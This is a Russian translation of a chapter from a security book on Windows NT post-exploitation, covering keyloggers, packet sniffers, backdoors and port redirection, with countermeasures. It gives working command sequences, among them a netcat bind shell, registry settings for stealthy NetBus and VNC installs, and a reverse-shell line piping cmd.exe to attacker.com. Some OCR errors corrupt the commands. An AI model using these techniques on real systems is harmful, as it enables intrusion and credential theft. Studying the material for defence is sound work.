    За несколько недель работы утилита IKS, как правило, перехватывает хотя бы одну пару "имя пользователя/пароль" уровня домена, которые обычно находятся после записи, сгенерированной при нажатии <Ctrl+Alt+Del>.

    Контрмеры: защита от программ-регистраторов



    Обнаружить программы-регистраторы не так-то просто. Это объясняется тем, что они внедряются в систему на низком уровне. Что касается IKS, мы рекомендуем поискать в системном реестре параметр LogName, который должен находиться где-то в группе параметров HKLM\SYSTEM\CurrentControlSet\Services. Значением этого параметра является путь к журналу регистрации нажимаемых клавиш. Параметр, в котором находится данное значение, можно безболезненно удалить (естественно, соблюдая обычные предосторожности, связанные с редактированием системного реестра). Для обнаружения же самого драйвера IKS требуется обладать в какой-то степени навыками сыщика, чтобы распознать его среди прочих файлов . sys, хранящихся в каталоге %systemroot%\system32\drivers. Самым простым методом является проверка свойств каждого файла. Во вкладке Version диалогового окна свойств IKS будет указано IKS NT4 Device Driver, а в качестве внутреннего имени — iksnt. sys.
    Получив доступ к домену, взломщик захочет воспользоваться своим статусом администратора сервера в качестве плацдарма для дальнейшего "захвата территорий". В следующем разделе описываются некоторые методики достижения этой цели и соответствующие им контрмеры.


    18.gif

    Изображение: 

    9. Анализаторы сетевых пакетов



    Анализаторы сетевых пакетов


    Перехват пакетов, передаваемых в локальной сети, является одним из наиболее эффективных способов дальнейшего проникновения в сеть после того, как взломщик получил доступ к одному узлу. В настоящее время имеется множество средств перехвата пакетов, в том числе один из самых знаменитых коммерческих наборов анализа протоколов Sniffer Pro от компании Network Associate (http://www.nai.com). Этот комплект средств появился сразу же за выпуском прекрасной свободно распространяемой программы CaptureNet 3.12, являющейся частью набора SpeNet/PeepNet от Лаврентия Никулы (Laurentiu Nicula), который можно найти по адресу http://packetstorm.securify.com. Достаточно много можно сказать и о приложении Network Monitor, входящем в комплект поставки системы NT/2000. Эта утилита позволяет отслеживать трафик лишь локального узла. Однако при установке сервера SMS (Systems Management Server) можно воспользоваться полной версией Network Monitor.
    В то же время очевидно, что графический интерфейс этих программ препятствует их применению в тех случаях, когда основным требованием является скрытность выполняемых действий и можно лишь удаленно воспользоваться командной строкой. В следующих разделах будут рассмотрены некоторые программы-анализаторы сетевых пакетов, которые без проблем можно установить удаленно и использовать из командной строки, а также несколько средств на базе интерфейса Win32.

    BUTTSniffer



    Среди взломщиков системы NT наиболее популярным средством является динамически загружаемая программа BUTTSniffer от Дилдога (DilDog), основного автора Back Orifice 2000. Программа BUTTSniffer состоит из двух основных компонентов, BUTTSniff.exe (139,264 байт) и BUTTSniff.dll (143,360 байт), каждый из которых можно переименовать. Для установки этих файлов достаточно просто загрузить их на целевой узел. Никаких дополнительных действий по установке не требуется. Запуск программы осуществляется из командной строки, в которой можно указать различные параметры. Параметр -1 позволяет получить список интерфейсов, доступных для перехвата пакетов. Взломщики наверняка воспользуются возможностью копирования всех захваченных данных в файл на жестком диске (для этого нужно не использовать параметры фильтрации), как показано в следующем примере.

    D:\Toolbox\buttsniffer>buttsniff-1
    WinNT: Version 4.0 Build 1381
    Service Pack: Service Pack 6
    # Interface Description
    -----------------------
    0 Remote Access Mac
    [\Device\NDIS3Pkt_AsyncMac4] (no promise.)
    1 3Com Megahertz FEM556B [\Device\NDIS3Pkt_FEM5567]
    D:\Toolbox\buttsniffer>
    buttsniff -d 1 D:\test\sniffl.txt p
    WinNT: Version 4.0 Build 1381
    Service Pack: Service Pack 6
    Press Ctrl-C to stop logging...
    Close requested
    D:\Toolbox\buttsniffer>
    cat D:\test\sniffl.txt
    Source IP: 192.168.7.36 Target IP: 192.168.7.200
    TCP Length: 13 Source Port: 3530
    Target Port: 21 Seq: 001A145E
    Ack: 6D968BEC
    Flags: PA Window: 8711
    TCP ChkSum: 6575 UrgPtr: 0
    00000000: 55 53 45 52 20
    67 65 6F 72 67 65 OD OA USER
    ernie..
    Source IP: 192.168.7.36
    Target IP: 192.168.7.200
    TCP Length: 17 Source Port: 3530
    Target Port: 21 Seq: 001A146B
    Ack: 6D968COF
    Flags: PA Window: 8676
    TCP ChkSum: 41325
    UrgPtr: 0 00000000: 50 41 53 53 20 47 65
    6F 72 67 65 30 30 31 3F OD
    PASS bert.
    00000010: OA

    Утилита BUTTSniffer отличается нестабильностью. При ее использовании в течение продолжительного времени она может привести к краху системы NT (появлению синего экрана смерти).

    fsniff



    Утилита fsniff написана компанией Foundstone, Inc., в которой авторы книги являются ведущими сотрудниками.

    Утилитой fsniff используется динамически загружаемый драйвер захвата пакетов (fsniff .sys), что значительно облегчает ее использование. Эта утилита выполняет автоматическую фильтрацию данных аутентификации, содержащихся в пакетах, как показано в следующем примере сеанса FTP. 

    С:\tmp>fsniff
    fsniff vl.О - copyright2000 foundstone, inc.
    driver activated
    192.168.200.15 [4439] -> 172.16.23.45 [21] }
    USER test PASS ralph
    172.16.23.45 [21] -> 192.168.200.15 [4439] }
    220 ftp.victim.net FTP server (Version wu-2.5.0(l)
    Tue Sep 21 16:48:12
    EOT 199
    9) ready.
    331 Password required for test.
    530 Login incorrect.
    packets received 27 - sniffed 10

    Анализаторы пакетов Win32 * на базе интерфейса WinPcap



    Многие популярные программы-анализаторы UNIX, предназначенные для захвата пакетов на уровне пользователей, созданы на базе интерфейса libpcap, не зависящего от используемой платформы. Свободно распространяемая версия Win32 этого интерфейса, WinPcap, была разработана группой исследователей из политехнического университета Торино (Politecnico di Torino) (http://netgroup-serv.polito.it/winpcap). Этот интерфейс предоставляет основу для создания некоторых интересных средств перехвата сетевых пакетов. Однако их неудобно устанавливать на удаленном узле и использовать из командной строки. Кроме того, в отличие от динамически загружаемых утилит BUTTSniffer и f sniff, для активизации таких средств зачастую требуется перезагрузка. В последующих разделах для полноты излагаемого материала, а также для облегчения дальнейших исследований в этой области, будут рассмотрены некоторые из средств, созданных на базе интерфейса WinPcap.

    WinDump



    Эта утилита, являющаяся аналогом утилиты tcpdump системы UNIX, написана авторами WinPcap. Как видно из приведенного ниже примера, эта утилита является простым средством перехвата пакетов, предоставляющим данные в необработанном виде. 

    D:\>windump
    windump: listening on\Device\Packet_E159xl
    01:06:05.818515 WKSTN.1044 >
    CORP-DC.139: P 287217:287285(68) ack
    3906909778 wi
    n 7536 (DF) [tos 0x86]
    01:06:05.818913 CORP-DC.139 >
    WKSTN.1044: P 1:69(68) ack 68 win 16556
    (DF)
    01:06:05.825661 arp who-has
    192.168.234.1 tell WKSTN
    01:06:05.826221 arp reply
    192.168.234.1 is-at 8:0:3d:14:47:d4

    dsniff для Win32



    Утилита dsniff является одним из самых лучших средств перехвата пакетов системы UNIX, предназначенных исключительно для получения паролей. Она была написана Дагом Сонгом (Dug Song) (http://naughty.monkey.org/~dugsong/dsniff/). Утилита dsniff автоматически выявляет и подробно анализирует каждый протокол, сохраняя лишь часть уникальных данных, используемых при аутентификации.
    Ранняя версия утилиты dsniff для Win32, появившаяся в мае 2000 года, была написана Майком (Mike) из компании eEye Digital Security. В ней отсутствуют многие возможности таких утилит, как arpredirect, что делает ее версию для системы Linux более робаст-ной (см. главу 8 и 10). Тем не менее, утилита dsniff может оказаться полезной для получения данных аутентификации. В следующем примере утилита dsniff была использована для перехвата пакетов, передаваемых в процессе аутентификации по протоколу POP.

    D:\dsniff>dsniff
    07/31/00 17:16:34 С574308-А ->
    mail.victim.net (pop)
    USER johnboy
    PASS goodnight

    Контрмеры: защита от перехвата пакетов



    Если приведенные выше советы показались вам недостаточными, дополнительно можно порекомендовать следующее. При передаче информации по сети используйте механизмы шифрования, такие как сервер SSH (Secure Shell), протокол SSL (Secure Sockets Layer), шифрование почтовых сообщений POP (Pretty Good Privacy) или шифрование на уровне IP, которое обеспечивается при реализации виртуальных частных сетей на-базе протокола IPSec (см. главу 9). Это надежные средства защиты от атак, направленных на перехват пакетов. Использование сетей с коммутируемой архитектурой и виртуальных локальных сетей (Virtual Local Area Network) может значительно снизить риск взлома, однако в случае применения таких средств, как утилиты dsnif f и arpredirect из UNIX (см. главу 10), нельзя предоставить никаких гарантий.

    При печати второго издания этой книги был выпущен совместимый с системой NT/2000 сервер SSH, который можно найти по адресу http://marvin.criadvantage.com/caspian/Software/SSHD-NT/default.php. Многие годы он служил основой безопасного удаленного управления системами на базе UNIX, и очень интересно познакомиться с новой версией, которая позволяет из командной строки удаленно управлять системами NT/2000. Ее можно рассматривать как альтернативу терминального сервера. Более подробную информацию о сервере SSH можно найти по адресу http://www.employees.org/-satch/ssh/faq/ssh-faq.html.


    10. Удаленное управление и потайные ходы

     

    Удаленное управление и потайные ходы

    Мы не раз отмечали, что в системе NT недостаточно хорошо обстоят дела с удаленным выполнением команд, однако до этого момента картина освещалась несколько однобоко. Дело в том, что после получения статуса администратора у взломщика появляется целый ряд возможностей выполнения таких операций.

     Утилита remote.exe (NTRK)

     

    В состав NTRK входят две утилиты, обеспечивающие удаленное выполнение команд: Remote Command Line (remote.exe) и Remote Command Service (rcmd.exe и rcmdsvc.exe, клиент и сервер соответственно). Эти утилиты включены лишь в серверный вариант NTRK.
    Из них большую угрозу представляет утилита remote.exe, поскольку ее легче установить и она более проста в использовании. Сложность применения rcmdsvc. exe в основном объясняется тем, что ее нужно установить и запустить на удаленном компьютере как службу, тогда как remote.exe не нуждается в дополнительных средствах и может работать как в режиме сервера, так и в режиме клиента. Нужный режим легко задать с помощью параметра командной строки (remote.exe /С— для клиента, remote.вхв /S —- для сервера). Однако с утилитой remote.exe возникает другая проблема из разряда "Что было раньше — курица или яйцо?" Дело в том, что для ее запуска на удаленном компьютере в качестве сервера сначала необходимо, чтобы на этом компьютере было разрешено удаленное выполнение команд. Эта проблема решается только при наличии доступа в качестве администратора, с использованием службы Schedule системы NT, также известной как команда AT (которая доступна только администраторам).
    Для начала нужно скопировать файл remote. exe в каталог удаленной системы, в котором разрешено выполнение программ. Проще всего это сделать, подключившись к совместно используемому системному ресурсу с$ в качестве администратора и скопировать указанный файл в каталог %systemroot%\system32. При этом утилита, с одной стороны, будет находиться в каталоге, в котором Windows по умолчанию производит поиск выполняемых файлов, а с другой — ее будет трудно случайно обнаружить среди множества разных системных файлов.
    Затем необходимо запустить скопированную утилиту remote. exe с помощью команды AT. Однако, прежде чем это сделать, нужно провести подготовительную работу. Во-первых, на удаленной системе должна быть запушена служба Schedule. С этой задачей может справиться еще одна прекрасная утилита Service Controller (sc.exe) из набора NTRK. После этого с помощью команды net time необходимо сверить часы локальной системы с часами удаленной, как показано ниже. 

    С:\> ас \\192.168.202.44 start schedule
    SERVICE_NAME: schedule
    TYPE 10 WIN32_OWN_PROCESS
    STATE 2 START_PENDING
    (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE 0 (0x0)
    SERVICE_EXIT_CODE 0 (0x0)
    CHECKPOINT 0x0
    WAIT_HINT OxVdO
    C:\> net time \\192.168.202.44
    Current time at \\192.168.202.44 is 5/29/99 10:38 PM
    The command completed successfully.

    Для запуска команд в течение нескольких секунд можно использовать утилиту soon из набора NTRK.

    Теперь можно воспользоваться командой AT и запустить экземпляр remote. exe в серверном варианте, запланировав запуск через две минуты от текущего времени взламываемого компьютера (для использования в команде пробелов ее необходимо заключить в двойные кавычки). С помощью второй команды, как показано ниже, можно убедиться, что задание было запланировано корректно (для исправления ошибок воспользуйтесь первой командой AT с параметром [номер задания] /delete).

    С:\> at \\192.168.202.44 10:40Р ""remote /s cmd
    secret""
    Added a new job with job ID = 2
    C:\> at \\192.168.202.44
    Status ID Day Time Command Line
    2 Today 10:40 PM remote /s cmd secret

    Когда наступает момент выполнения запланированной команды, соответствующий номер задания исчезает из листинга, выводимого командой AT. Если команда была введена корректно, это означает, что сервер remote заработал. Теперь взломщик имеет доступ к командной строке удаленной системы с помощью клиентского режима команды remote. Во избежание путаницы мы используем в примере для локальной системы приглашение D:>, а для удаленной — С:>. В данном примере используется команда DIR для просмотра каталога удаленной системы, а затем с помощью команды @Q завершается работа клиента, а сервер продолжает работать (команда @к завершает работу сервера).

    D:\> remote /с 192.168.202.44 secret
    *****************************
    *********** remote **********
    *********** CLIENT **********
    *****************************
    Connected..
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1998 Microsoft Corp.
    C:\> dir winnt\repair\sam._
    dir winnt\repair\sam._ Volume in drive С has no label.
    Volume Serial Number is D837-926F
    Directory of C:\winnt\repair
    05/29/99 04:43p 10,406 sam.
    _1 File(s) 10,406 bytes
    1,243,873,280 bytes free
    C:\> @q
    *** SESSION OVER ***
    D:\>

    Да, пожалуй, вряд ли ребята из Microsoft могли придумать что-то еше более простое для хакера средней руки! Теперь мы можем запускать файлы на удаленной системе, хотя только из командной строки. Еше одним ограничением утилиты remote.exe является то, что программы, использующие консольный программный интерфейс Win32, также работать не будут. Однако в любом случае это лучше, чем вообще отсутствие возможности удаленного запуска. Как мы вскоре увидим, с ее помощью на удаленной системе можно установить более мощные средства управления.
    Наконец, необходимо отметить еще одно важное свойство утилиты remote.exe, которое заключается в поддержке именованных каналов. Она будет работать на любых двух узлах, поддерживающих один и тот же протокол — IPX, TCP/IP либо NetBEUI.

    Удаленный доступ к командной оболочке с помощью netcat

     

    Еще одним простым способом организации "потайного хода" является применение "армейского швейцарского ножа TCP/IP"— утилиты netcat (http://www.ldpht. com/netcat). Утилиту netcat можно настроить на прослушивание определенного порта с последующим запуском исполняемой программы, если удаленная система подключается к данному порту. Настроив утилиту netcat на запуск интерпретатора командной строки NT, можно сделать так, чтобы этот интерпретатор запустился на удаленной системе. Синтаксис для запуска команды netcat в режиме скрытого прослушивания приведен в следующем примере. Параметр -L позволяет восстанавливать разорванное соединение; -d активизирует режим скрытого прослушивания (т.е. без обмена информацией с консолью); -е позволяет задать запускаемую программу (в данном случае — интерпретатор командой строки NT cmd. exe); а -р указывает порт, который будет прослушиваться. С:\TEMP\NC1lNT>nc -L -d -e and.exe -p 8080
    Теперь любой злоумышленник, подключившийся к порту 8080, сможет на удаленном компьютере запустить интерпретатор командной строки. В следующем примере показано, как, подключившись к вышеуказанному порту рассматриваемого узла (192.168.202.44), получить удаленный доступ к интерпретатору командной строки. Для того чтобы устранить путаницу, мы снова используем в локальной системе приглашение D: \>, а в удаленной — С: \TEMP\NC11NТ>.

    D:\> nc 192.168.202.44 8080
    Microsoft(R) Windows NT(TM)
    (С) Copyright 1985-1996 Microsoft Corp.
    С:\TEMP\NC11NT>
    С:\TEMP\NC1lNT>ipconfig
    ipconfig
    Windows NT IP Configuration Ethernet adapter FEM5561:
    IP Address. ........: 192.168.202.44
    Subnet Mask ........: 255.255.255.0
    Default Gateway ......: C:\TEMP\NCllNT>exit
    D:\>

    Таким образом, теперь удаленный пользователь может выполнять команды и запускать программы. Теперь судьба удаленного компьютера целиком и полностью зависит лишь от фантазии взломщика.

    NetBus

     

    Невозможно, рассказывая о безопасности NT, умолчать о NetBus — "старшей сестре" широко известной утилиты Back Orifice (ВО) для Win 9x, разработанной группой хакеров "Культ мертвой коровы" (cDc — Cult of the Dead Cow). Она предназначена для удаленного управления и хакинга. Главное различие между NetBus и ВО состоит в том, что первая работает как на платформе Windows NT, так и в Win 9x (правда, последние версии ВО также работают в NT — подробнее см. в следующем разделе "Back Orifice 2000"). Первая версия утилиты, разработанной Карлом-Фриде-риком Нейктером (Carl-Fredrik Neikter), распространялась бесплатно, но в начале 1999 года появившаяся версия 2.0 вышла уже в варианте NetBus Pro, который распространяется узлом http://www.netbus.org по цене $15. В новой версии были устранены многие проблемы NetBus, такие как необходимость физического доступа для ее использования в режиме скрытой работы, а также несовместимость с некоторыми средствами доставки "троянских коней". Однако "взломанные" версии утилиты, имеющиеся на хакерских узлах в Internet, не поддерживают данных возможностей. Таким образом, в Internet можно найти лишь недостаточно надежные версии NetBus (последняя версия, выпущенная перед выходом NetBus Pro, имела номер 1.7). Учитывая, сколько новых возможностей реализовано в профессиональной версии, мы не будем тратить время на описание методов использования предыдущих версий.
    NetBus — это приложение, созданное на базе архитектуры клиент/сервер. Сервер называется NBSVR.EXE, однако его, конечно же, можно переименовать, присвоив ему другое имя. Для того чтобы клиент мог установить соединение с удаленной системой, на ней сначала должен быть запущен сервер. Хотя ничто не препятствует установке NetBus без привилегий администратора путем использования вложения почтового сообщения или какой-нибудь другой уловки, вероятность успеха такого метода будет низкой, если системный администратор предпринял соответствующие меры защиты (иными словами — никогда не запускайте файлов, присланных по электронной почте или каким-либо другим способом неизвестными вам лицами). Поэтому мы будем рассматривать утилиту NetBus в контексте ситуации, когда она скрытно установлена взломщиком, обладающим привилегиями администратора.
    Первое, что должен сделать злоумышленник, — скопировать NBSRV.EXE в каталог %systemroot%\system32. Кроме того, необходимо настроить NetBus для запуска в скрытом режиме. Обычно этот режим активизируется с помощью графического пользовательского интерфейса, однако поскольку при удаленном доступе графический интерфейс использовать невозможно, для внесения соответствующих изменений в системный реестр придется воспользоваться средством редактирования системного реестра regini . exe, входящим в состав NTRK.
    Для внесения изменений в системный реестр утилита regini в качестве входных данных должна получить соответствующий текстовый файл. Поэтому сначала нужно создать такой файл (в данном примере мы назовем его NETBUS.TXT) и поместить в него параметры, которые необходимо внести в системный реестр. Самый простой метод создания такого файла заключается в получении его с помощью локальной установки NetBus Pro 2.01 и утилиты regdmp из набора NTRK. В приведенном ниже примере листинг, сгенерированный утилитой regini в процессе внесения изменений в системный реестр удаленной системы, отображает перечень параметров, которые должны присутствовать в файле NETBUS.TXT.

    D:\temp>regini -m \\192.168.202.44 netbus.txt
    HKEY_LOCAL_MACHINE\SOFTWARE\Net SolutionsXNetBus Server
    General
    Accept = 1
    TCPPort = 80
    Visibility = 3
    AccessMode = 2
    AutoStart = 1
    Protection
    Password = impossible

    Данные параметры управляют основными функциями утилиты NetBus. Самыми важными из них являются следующие: General\TCPPort, который настраивает сервер NBSVR на прослушивание порта 80 (это лишь рекомендация, так как порт HTTP, скорее всего, не будет отфильтровываться маршрутизатором); visibility =3, значение, задающее режим скрытой работы; AutoStart = 1, включающее режим автоматического запуска серверной части NBSVR при загрузке Windows (при этом автоматически создается дополнительный параметр реестра в группе HKLM\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices, содержащий значение с типом REG_SZ вида С:\WINNT\SYSTEM32\NBSvr.EXE).
    После того как системный реестр отредактирован, можно запустить NBSRV.EXE из командной строки удаленной системы, а затем запустить клиентскую часть на локальной системе и подключиться к находящемуся в состоянии ожидания серверу. На следующем рисунке показан графический пользовательский интерфейс NetBus, в меню которого выбрана команда Reboot, с помощью которой на удаленной системе можно, выполнить один их самых "жестоких" трюков — перезагрузку.

    Большинство остальных команд включено в программу, скорее для "невинных шалостей", а не для извлечения какой-то пользы (открытие и закрытие дисковода компакт-дисков, блокировка клавиатуры и т.д.). Одним из немногих действительно полезных средств является регистратор нажатия клавиш, диалоговое окно которого показано ниже. Кроме того, с помощью такой полезной функции, как перенаправление портов, можно использовать взломанный компьютер как плацдарм для проникновения на другие узлы сети.

     

    Контрмеры против использования NetBus

     

    Показанные выше изменения в системном реестре очень просто обнаружить и удалить, однако более старые версии NetBus размещали файл изменений реестра и файл сервера в разных местах и под разными именами (ранее выполняемый файл серверной части NetBus по умолчанию назывался patch.exe и часто переименовывался в [space] .exe). Кроме того, различные версии NetBus прослушивают разные порты (чаше всего по умолчанию используются порты 12345 и 20034). Наконец, все установленные по умолчанию конфигурационные параметры легко модифицировать в соответствии с желаниями взломщика. Поэтому самый лучший совет, который мы можем дать, состоит в том, чтобы найти хорошую утилиту, позволяющую удалить NetBus. Современные антивирусные пакеты легко справляются с этой задачей, поэтому нужно их регулярно использовать. Однако сначала убедитесь, что антивирусный пакет в процессе проверки не ограничивается поиском имен стандартных файлов NetBus и параметров системного реестра. Кроме того, мы считаем, что нужно также регулярно проверять параметры, управляющие запуском программ при загрузке Windows (см. раздел "Параметры Реестра, Обеспечивающие Выполнение Программ" выше в данной главе), поскольку избавиться от вредоносной программы, которая всякий раз запускается вместе с Windows, невозможно.
    Без сомнения, утилита NetBus заслуживает гораздо большего внимания, чем мы уделили ей, однако необходимо отметить, что в настоящее время есть более удобные средства удаленного управления, которые не только имеют графический интерфейс, но и распространяются в Internet бесплатно (см. ниже раздел "Удаленная Атака На GUI Системы NT С Помощью Winvnc"). Однако зачастую утилита NetBus устанавливается в процессе установки других средств, что обеспечивает взломщику пространство для маневра. Так что будьте очень внимательны.

    Back Orifice 2000

     

    Хотя первая версия Back Orifice не работала в системе NT, всего за год ее программисты из группы хакеров "Культ мертвой коровы" (Cult of the Dead Cow) справились с задачей переноса своего детища на эту платформу. Версия Back Orifice 2000 (ВО2К) появилась 10 июля 1999 года, чем изрядно подпортила настроение администраторам NT, которые посмеивались над ВО9х По предоставляемым функциям ВО2К практически не отличается от ВО9х в том, что касается удаленного управления. Мы уже подробно рассматривали соответствующие функции в главе 4, поэтому не будем повторять их здесь еще раз, а сосредоточимся лишь на том, как распознать и удалить ВО2К, установленную в вашей сети.

    Контрмеры: защита от Back Orifice 2000

     

    Как и в случае с NetBus, большинство ведущих разработчиков антивирусного программного обеспечения обновили свои программные продукты, так что теперь с их помощью можно распознать и удалить ВО2К. Поэтому самый простой способ обезопасить себя от ВО2К — регулярно обновлять антивирусный пакет. Существуют также и специальные средства обнаружения и удаления ВО, однако к ним нужно относиться с осторожностью. Некоторые из них не удаляют ВО2К, а устанавливают, играя роль "троянских коней". Одним из продуктов, которым можно доверять, является Internet Scanner компании Internet Security Systems (ISS). С его помощью можно выявить присутствие ВО2К в сети, проверяя все находящиеся в режиме ожидания запросов порты.
    Один из лучших методов удаления ВО2К заключается в использовании самой программы. В меню утилиты Sever Command Client (bo2kgui) из набора ВО2К имеется команда Server Control^Shutdown Server, предназначенная для удаления сервера.
    К сожалению, необходимо отметить, что все описанные выше контрмеры существенно ослабляются тем обстоятельством, что разработчики программы ВО2К опубликовали ее исходный код. Это может привести к появлению модификаций Back Orifice, обнаружить которые будет не так просто. Поэтому более эффективное решение лежит не столько в технической, сколько в организационной плоскости, и состоит в обучении пользователей и объяснении им, насколько опасно запускать программы, полученные по электронной почте или загруженные из узлов Internet.

    Удаленная атака на GUI системы NT с помощью WinVNC

     

    Удаленное управление с помощью утилит командной строки — это хорошо, но все же NT является операционной системой с мощным графическим интерфейсом. Программа NetBus предоставляет возможность удаленного управления с помощью графического интерфейса, но версия, имеющаяся в нашем распоряжении во время написания книги, работает слишком медленно и к тому же нестабильно. Тем не менее, существует прекрасное средство, свободное от всех этих недостатков, — пакет Virtual Networking Computing (VNC), созданный кембриджской лабораторией AT&T и распространяемый через https://www.comparitech.com/vpn/what-is-a-vnc-and-how-does-it-differ-from-a-vpn/ (более подробное обсуждение VNC приведено в главе 13). Одна из причин, по которой VNC выгодно отличается от прочих программ аналогичного назначения (помимо столь примечательного факта, что VNC абсолютно бесплатна!), заключается в том, что ее установка через удаленное сетевое соединение выполняется не намного сложнее, чем локальная установка. Используя удаленный сеанс командной строки, который был рассмотрен выше, достаточно лишь установить на удаленный компьютер службу VNC и обеспечить ее скрытый запуск, внеся одно-единственное изменение в системный реестр. Ниже приведено краткое описание этой процедуры, но для того, чтобы лучше разобраться в методах управления VNC из командной строки, мы все же рекомендуем изучить полную документацию по VNC, которую также можно найти по указанному выше адресу URL.
    Первый этап состоит в копировании исполняемого файла и библиотек VNC (WINVNC.EXE, VNCHooks.DLL И OMNITHREAD_RT.DLL) на удаленный компьютер, который после установки будет играть роль сервера. Для этого можно использовать любой каталог, но лучше всего "укрыть" эти файлы "глубоко в недрах" каталога %systemroot%. Необходимо также учитывать, что после запуска сервера последние версии WinVNC автоматически помещают небольшую зеленую пиктограмму на панели задач. Запуск из командной строки версий 3.3.2 и более ранних менее незаметен для пользователей (конечно, это не распространяется на список процессов, в котором без труда можно отыскать WinVNC. EXE).
    После того как файл WINVNC.EXE скопирован, необходимо настроить доступ к VNC с использованием пароля, так как при запуске службы WINVNC по умолчанию на экране появляется диалоговое окно, требующее ввода пароля, прежде чем служба разрешит входящие соединение (обеспокоенность разработчиков вопросами безопасности просто умиляет!). Кроме того, службе WINVNC необходимо находиться в режиме ожидания входящих соединений, что также настраивается посредством графического интерфейса. Для того чтобы настроить соответствующие параметры программы, нужно напрямую внести необходимые изменения в удаленный системный реестр с помощью утилиты regini. exe, как это было сделано при удаленной установке NetBus.
    Сначала нужно создать файл WINVNC. INI и внести в него подлежащие изменению параметры системного реестра и их значения. Приведенные в следующем примере значения были получены из реестра локального компьютера после установки на нем WinVNC с использованием утилиты regdmp из набора NTRK (бинарное представление пароля соответствует строке secret).
    Вот содержимое файла WINVNC. INI.

    HKEY_USERSX.DEFAULTXSoftware\ORL\WinVNC3
    SocketConnect = REG_DWORD 0x00000001
    Password = REG_BINARY 0x00000008
    Ox57bf2d2e Ох8е6сbО6е

    Затем с помощью утилиты regini эти параметры необходимо поместить в системный реестр удаленного компьютера.

    С:\> regini -m \\192.168.202.33 winvnc.ini
    HKEY_USERS\.DEFAULTXSoftware\ORL\WinVNC3
    SocketConnect = REG_DWORD 0x00000001
    Password = REG_BINARY 0x00000008 Ox57bf2d2e ОхЭе6сbО6е

    Наконец установите программу WinVNC в качестве службы и запустите ее. В следующем примере показано, как это сделать с помощью удаленного сеанса командной строки. С:\> winvnc -install

    С:\> net start winvnc
    The VNC Server service is starting.
    The VNC Server service was started successfully.

    Теперь можно запустить приложение vncviewer и подключиться к удаленному компьютеру. Ниже показаны два диалоговых окна, в первом из которых приложение vnc viewer уведомляет пользователя о том, что установлен сеанс связи с "дисплеем О", имеющим IP-адрес 192.168.202.33. (Синтаксис узел-дисплей эквивалентен принятому в системе оконного интерфейса X Window системы UNIX. Все системы, работающие под управлением Windows, по умолчанию обозначаются как дисплей 0.) Второе диалоговое окно предназначено для ввода пароля (вы еще не забыли, какое слово мы выбрали в качестве пароля?).

    Вуаля! Перед вами во всей своей красе появляется изображение рабочего стола удаленного компьютера, как показано на рис. 5.9. При этом указатель мыши ведет себя так, словно вы держите в руках не свою мышь, а мышь удаленного компьютера.
    Очевидно, что возможности VNC изумительны: вы можете даже воспользоваться комбинацией клавиш <Ctrl+Alt+Del> для перезагрузки удаленной системы.

    Остановка и удаление WinVNC

     

    Самый простой способ остановки службы WinVNC и ее удаления состоит в использовании двух следующих команд.

    net stop winvnc
    winvnc -remove

    Для удаления оставшихся в реестре параметров воспользуйтесь утилитой из набора NTRK REG.EXE, как показано в следующем примере.

    C:\>reg delete \\192.168.202.33
    HKEY_LOCAL_MACHINE\System\
    CurrentControlSet\Services\WinVNC

     

     

    19.gif

    Изображение: 

    20.gif

    Изображение: 

    21.gif

    Изображение: 

    11. Перенаправление портов



    Перенаправление портов


    Выше было рассмотрено несколько программ, которые можно использовать для удаленного управления из командной строки. Все эти средства обсуждались в контексте установки непосредственного удаленного соединения. Однако, что делать в той ситуации, когда брандмауэр блокирует прямой доступ к целевому компьютеру? Подобную преграду взломщики могут обойти с помощью перенаправления портов (port redirection). Этот вопрос подробно будет изложен в главе 14, однако сейчас мы познакомимся с некоторыми средствами и приемами, которые могут оказаться полезными для хакинга компьютеров под управлением системы NT.
    Как только взломщики успешно справились с "главным стражем" безопасности — брандмауэром, — для передачи всех пакетов "желанной цели" они могут воспользоваться механизмом перенаправления портов. Важно оценить всю опасность подобной деятельности, поскольку в данном случае взломщики могут получить доступ к любому компьютеру, расположенному позади брандмауэра. В процессе перенаправления осуществляется прослушивание определенных портов и передача пакетов к заданной вторичной цели. Ниже будут рассмотрены некоторые приемы перенаправления портов, которые можно вручную осуществить с помощью утилит netcat, rinetd и fpipe.
    Схема процесса перенаправления портов представлена на рис. 14.4 в главе 14.

    Захват командной оболочки м помощью netcat



    Если имеется возможность поместить утилиту netcat на целевой компьютер, расположенный позади брандмауэра, то через любой требуемый порт можно получить "в свое распоряжение" удаленную командную оболочку. Такую ситуацию мы называем "захватом оболочки", поскольку в этом случае на рабочем компьютере взломщика сосредоточиваются все функции оболочки удаленной системы. Вот пример команды, запущенной взломщиком из удаленной командной строки. nс attacker.com 80 | cmd.exe | nс attacker.com 25
    Если хакер на своем компьютере attacker.com с помощью утилиты netcat осуществляет прослушивание TCP-портов 80 и 25, и при этом порт 80 разрешает передачу входящих, а порт 25 — исходящих пакетов на/с компьютера-жертвы через брандмауэр, то эта команда позволяет "захватить" командную оболочку удаленной системы. На рис. 5.9 показан пример экрана хакерской системы: в верхнем окне содержатся входные команды, передаваемые через порт 80 (ipconfig), а в нижнем окне представлены результаты, полученные с узла-жертвы через порт 25.



    Рис. 5.9. Используя утилиту netcat на компьютере взломщика и на целевом узле, можно захватить командную оболочку. Команды, введенные в верхнем окне на рисунке, выполняются на удаленной системе, а результаты отображаются в нижнем окне

    Утилита rinetd



    Реализация перенаправления портов с помощью трех настроенных вручную сеансов netcat может оказаться далеко не наилучшим способом. Для этого можно воспользоваться различными утилитами, специально предназначенными для перенаправления портов. Эти средства можно найти в Internet. Одной из наиболее мощных утилит является rinetd — сервер перенаправления Internet Томаса Боутела (Thomas Boutell), который можно найти по адресу http://www.boutell.com/rinetd/index.html. С ее помощью можно перенаправить TCP-соединения с одного IP-адреса и порта на другой. Утилита rinetd функционирует подобно datapipe (см. главу 14). Существует также версия, поддерживающая интерфейс Win32 (включая 2000), а также Linux. Утилиту rinetd очень легко использовать: достаточно просто создать конфигурационный файл, содержащий правила передачи пакетов, в следующем формате.
    адрес_привязки порт_привязки адрес_соединения порт_соединения
    Затем нужно запустить команду rinetd -с <имя_файла_настройки>. Как и утилита netcat, rinetd функционирует через неправильно настроенный брандмауэр.

    Утилита fpipe



